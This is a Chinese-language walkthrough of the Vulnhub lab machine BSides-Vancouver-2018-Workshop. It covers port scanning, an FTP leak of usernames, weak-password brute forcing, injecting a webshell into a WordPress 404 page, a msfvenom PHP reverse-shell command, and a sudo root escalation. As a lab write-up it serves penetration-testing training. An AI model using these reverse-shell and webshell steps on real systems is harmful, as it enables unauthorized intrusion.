靶机渗透测试(BSides-Vancouver-2018-Workshop)

靶机渗透测试(BSides):

Vulnhub靶机 BSides-Vancouver-2018-Workshop
靶机:修改靶机的网络配置为桥接模式。
攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机。
靶机难度:(初级
目标:成功渗透进入靶机,找到flag.txt,提权到root权限。


渗透流程:

1.探测主机ip:(netdiscover -i eth0 -r 网关)
2.nmap扫描目标主机端口服务:

在这里插入图片描述
目标主机开启了21-ftp,22-ssh,80-http等服务端口;

3.web渗透(80端口)

3.1 进行web目录扫描,dirb ,御剑工具等等;
3.2 探测出含有robots.txt目录,在/robots.txt中发现一个反爬虫目录/backup_wordpress;
3.3 在/backup_wordpresst中发现一个登陆目录/wp-login;
在这里插入图片描述

4.ftp-21端口服务

4.1 ftp://靶机ip
4.2 访问后,发现存在目录遍历漏洞

发现了一个users.txt.bk,里面存储着用户名

在这里插入图片描述

4.3 根据ftp服务得到的用户名进行用户名枚举,弱口令爆破得到web页面
用户名密码:john(enigma);
在这里插入图片描述

4.4 登陆后制作监听文件(在404页面注入监听木马),开启nc监听在index.php页面写入大马,访问index.php,然后菜刀连接,成功获取shell;
将获得的shell 提升至root 权限
访问/usr/local/bin/cleanup
发现权限很高,可以执行读写;

4.5 也可以使用msf生成木马:

Msfvenom -p php/meterpreter/reverse_tcp LHOST=IP LPROT=端口 -f raw > shell.txt

-p 选择payload

-e 选择使用的编码

-i 给payload编码的次数

-b 避免出现的字符

-f 输出文件类型

-o 输出文件目录

将木马上传后,msf设置监听;然后通过输入任意不存在的页面,可触发上传的代码,反弹shell到msf上;最后进行提权操作;

5.ssh-22端口:

5.1 根据ftp服务得到的用户名进行用户名枚举,弱口令爆破得到ssh连接的用户名密码:anne(princess);

5.2 ssh连接:
在这里插入图片描述
5.3 sudo提权
whoami>发现此时用户为anne,并非root权限
pwd>查看/home/anne
groups>anne sudo
unmae -a
用户anne属于sudo组,可直接进行提权

sudo -i
whoami
root

  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值